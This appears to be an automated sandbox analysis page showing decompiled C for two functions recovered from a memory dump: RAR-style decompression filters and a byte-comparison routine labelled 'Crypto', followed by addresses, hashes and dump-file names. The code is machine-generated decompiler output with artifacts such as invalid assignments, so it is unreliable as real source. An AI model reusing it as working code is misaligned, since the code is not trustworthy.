Download Yara Rule

C-Code - Quality: 100%

			E0083BB6E(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				signed int _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed int _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed char _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed char _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed char _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *(_t355 + 0x60) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *(_t355 + 0x60);
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x28) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x30) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0x86d070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x28);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *((intOrPtr*)(_t355 + 0x64)) = 0;
						 *(_t355 + 0x38) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E0083C0D7(_t277, _t175, 4) == 5) {
									E0083C122(_t277, E0083C0D7(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x34);
								_t285 =  *(_t355 + 0x60);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x60) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x30);
						_t316 =  *(_t355 + 0x28);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x28) = _t316;
						 *(_t355 + 0x30) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x60) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x28) = _t289;
					 *(_t355 + 0x34) = _t278;
					 *(_t355 + 0x3c) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x24) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x14) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x1c) = 0;
						 *(_t355 + 0x10) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x60);
							_t221 =  *(_t355 + 0x34) - _t351;
							_t352 =  *(_t355 + 0x34);
							 *(_t355 + 0x20) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x3c) = E00854EA7(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x24) = E00854EA7(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t234 = E00854EA7(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t292 =  *((intOrPtr*)(_t355 + 0x44));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x18);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
										_t279 =  *(_t355 + 0x30);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x2c);
										}
									} else {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
									}
								}
								_t223 =  *(_t355 + 0x24);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x24) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x20);
							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
							_t351 =  *(_t355 + 0x14);
							_t218 =  *(_t355 + 0x1c);
							_t319 =  *(_t355 + 0x10);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x1c) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x3c);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x2c) = _t293;
					 *(_t355 + 0x30) = _t235;
					 *(_t355 + 0x38) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x34) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
							 *(_t355 + 0x1c) = 0;
							E0084E920(_t336, _t355 + 0x40, 0, 0x1c);
							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x24) = _t336;
							if(_t336 <  *(_t355 + 0x30)) {
								_t238 =  *(_t355 + 0x60);
								do {
									_t322 =  *(_t355 + 0x1c);
									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
									_t297 =  *(_t355 + 0x2c);
									 *(_t355 + 0x18) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x2c) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
									 *(_t355 + 0x24) = _t304;
									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00854EA7(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00854EA7(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00854EA7(_t323,  *(_t355 + 0x20) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00854EA7(_t323, (_t323 << 3) -  *(_t355 + 0x20));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00854EA7(_t323,  *(_t355 + 0x24) + _t349);
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00854EA7(_t323, _t349 -  *(_t355 + 0x14));
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00854EA7(_t323, _t349 +  *(_t355 + 0x14));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x10);
										_t238 =  *(_t355 + 0x60);
									} else {
										_t324 =  *(_t355 + 0x40);
										_t266 = 0;
										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x40 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x10);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x10) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x60) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x60);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x24) + _t281;
									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
									 *(_t355 + 0x24) = _t306;
								} while (_t306 <  *(_t355 + 0x30));
								_t336 =  *(_t355 + 0x34);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x34) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x28) = _t309;
				 *(_t355 + 0x60) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x24) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x60)) {
							_t310 =  *(_t355 + 0x60);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x28);
								_t274 =  *(_t355 + 0x24);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x28) = _t309;
						 *(_t355 + 0x24) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x0083bb6e
0x0083bb78
0x0083bb7d
0x0083bc14
0x00000000
0x0083bc14
0x0083bb86
0x0083c05e
0x0083c061
0x0083c063
0x0083c066
0x0083c06f
0x0083c0d0
0x00000000
0x0083c0d0
0x0083c077
0x0083c079
0x0083c07b
0x0083c081
0x00000000
0x00000000
0x00000000
0x00000000
0x0083c087
0x0083c087
0x0083c087
0x0083c089
0x0083c08a
0x0083c08b
0x0083c08f
0x0083c095
0x0083c099
0x0083c0ac
0x0083c0b4
0x0083c0b8
0x0083c0b8
0x0083c09b
0x0083c0a0
0x0083c0a2
0x0083c0a8
0x0083c0a8
0x0083c0a0
0x0083c0ba
0x0083c0be
0x0083c0c1
0x0083c0c4
0x0083c0c4
0x0083c0c7
0x00000000
0x0083c0cb
0x0083bb8f
0x0083bf98
0x0083bf9a
0x0083bfa3
0x00000000
0x00000000
0x0083bfac
0x0083bfaf
0x0083bfb5
0x00000000
0x00000000
0x0083bfbf
0x0083bfc0
0x0083bfc4
0x0083bfca
0x0083bfcd
0x00000000
0x00000000
0x0083bfcf
0x0083bfd7
0x00000000
0x00000000
0x0083bfd9
0x0083bfdd
0x0083bfdf
0x0083bfe4
0x0083bfe8
0x0083bfec
0x0083bfed
0x0083bff4
0x0083bff8
0x0083c007
0x0083c022
0x0083c022
0x0083c027
0x0083c02b
0x0083c02b
0x0083c02f
0x0083c030
0x0083c033
0x0083c037
0x0083c03c
0x0083c040
0x0083c044
0x0083c044
0x0083c047
0x0083c048
0x0083c04b
0x0083c04f
0x0083c04f
0x00000000
0x0083c059
0x0083bb98
0x0083be4c
0x0083be4f
0x0083be52
0x0083be55
0x0083be59
0x0083be5c
0x0083be63
0x0083be67
0x0083be70
0x00000000
0x0083be87
0x0083be87
0x0083be89
0x0083be8d
0x0083be90
0x0083be94
0x0083be98
0x0083be9a
0x0083be9e
0x0083bea2
0x0083bea2
0x0083bea6
0x00000000
0x00000000
0x0083beac
0x0083beb3
0x0083beb7
0x0083beb9
0x0083bebd
0x0083bec1
0x0083bec5
0x0083bec7
0x0083beca
0x0083bed2
0x0083bed8
0x0083bee6
0x0083befb
0x0083beff
0x0083bf04
0x0083bf08
0x0083bf0b
0x0083bf11
0x0083bf21
0x0083bf27
0x0083bf2b
0x0083bf2f
0x0083bf31
0x0083bf31
0x0083bf17
0x0083bf17
0x0083bf1b
0x0083bf1b
0x0083bf11
0x0083bf35
0x0083bf3c
0x0083bf3f
0x0083bf47
0x0083bf4a
0x0083bf51
0x0083bf51
0x0083bf5b
0x0083bf5f
0x0083bf63
0x0083bf67
0x0083bf67
0x0083bf68
0x0083bf6c
0x0083bf75
0x0083bf79
0x0083bf8c
0x0083bf7e
0x0083bf82
0x0083bf85
0x0083bf89
0x0083bf89
0x00000000
0x0083bf90
0x0083be70
0x0083bba1
0x0083bc20
0x0083bc23
0x0083bc25
0x0083bc28
0x0083bc2e
0x0083bc32
0x0083bc3b
0x00000000
0x0083bc55
0x0083bc55
0x0083bc57
0x0083bc5d
0x00000000
0x00000000
0x00000000
0x00000000
0x0083bc5f
0x0083bc5f
0x0083bc5f
0x0083bc68
0x0083bc6d
0x0083bc6f
0x0083bc74
0x0083bc76
0x0083bc7b
0x0083bc83
0x0083bc87
0x0083bc8c
0x0083bc90
0x0083bc93
0x0083bc9b
0x0083bca1
0x0083bca5
0x0083bca5
0x0083bcb3
0x0083bcb7
0x0083bcc0
0x0083bcc4
0x0083bcc8
0x0083bcf1
0x0083bcf3
0x0083bd02
0x0083bd06
0x0083bd0a
0x0083bd13
0x0083bd23
0x0083bd33
0x0083bd43
0x0083bd53
0x0083bd61
0x0083bd6e
0x0083bd72
0x0083bd7a
0x0083be16
0x0083be1a
0x0083bd80
0x0083bd80
0x0083bd84
0x0083bd86
0x0083bd8c
0x0083bd8d
0x0083bd91
0x0083bd93
0x0083bd97
0x0083bd97
0x0083bd99
0x0083bd9e
0x0083bd9f
0x0083bda4
0x0083bda8
0x0083bdab
0x0083be0a
0x0083be11
0x0083be13
0x0083be13
0x00000000
0x0083be11
0x0083bdad
0x0083bdb0
0x0083bdfe
0x0083be05
0x0083be07
0x0083be07
0x00000000
0x0083be05
0x0083bdb2
0x0083bdb5
0x0083bdee
0x0083bdf5
0x00000000
0x00000000
0x0083bdf7
0x0083bdf8
0x0083bdf8
0x00000000
0x0083bdf8
0x0083bdb7
0x0083bdba
0x0083bde2
0x0083bde9
0x00000000
0x00000000
0x0083bdeb
0x00000000
0x0083bdeb
0x0083bdbc
0x0083bdbf
0x0083bdd6
0x0083bddd
0x00000000
0x00000000
0x0083bddf
0x0083bdd0
0x0083bdd0
0x00000000
0x0083bdd0
0x0083bdc4
0x0083bdc8
0x00000000
0x0083bdcf
0x0083bdcf
0x00000000
0x0083bdcf
0x0083bdc8
0x0083be1e
0x0083be22
0x0083be24
0x0083be28
0x0083be2c
0x0083be36
0x0083be36
0x0083be3a
0x0083be3b
0x0083be3f
0x00000000
0x0083be47
0x0083bc3b
0x0083bba6
0x00000000
0x00000000
0x0083bba8
0x0083bbab
0x0083bbad
0x0083bbb0
0x0083bbb7
0x0083bbc1
0x00000000
0x0083bbdb
0x0083bbdb
0x0083bbdd
0x0083bbe1
0x0083bbe1
0x0083bbe3
0x0083bbe9
0x0083bbeb
0x0083bbeb
0x0083bbef
0x0083bbef
0x0083bbf1
0x0083bbf4
0x0083bbf5
0x0083bbf8
0x0083bbfc
0x00000000
0x0083bbfe
0x0083bbfe
0x0083bc02
0x00000000
0x0083bc02
0x0083bbfc
0x0083bc06
0x0083bc06
0x0083bc07
0x0083bc0a
0x0083bc0e
0x0083bc0e
0x00000000
0x0083bbe1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aae2753320e0db542b4af19a8ac1aece7d89b2be491090a7013970d965d66e9
Instruction ID: a0fcaf1fbcba0ea6098e047849e125b0438460ccfec99241dbd25862ee6ca465
Opcode Fuzzy Hash: 8aae2753320e0db542b4af19a8ac1aece7d89b2be491090a7013970d965d66e9
Instruction Fuzzy Hash: 33F179B16083858FC718CE29C58456ABBE2FFC9318F145A2EF685D7341D730E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00850113, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00850113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00850113
0x00850113
0x00850119
0x008501a0
0x008501a2
0x008501a4
0x00000000
0x00000000
0x008501aa
0x008501b0
0x00850237
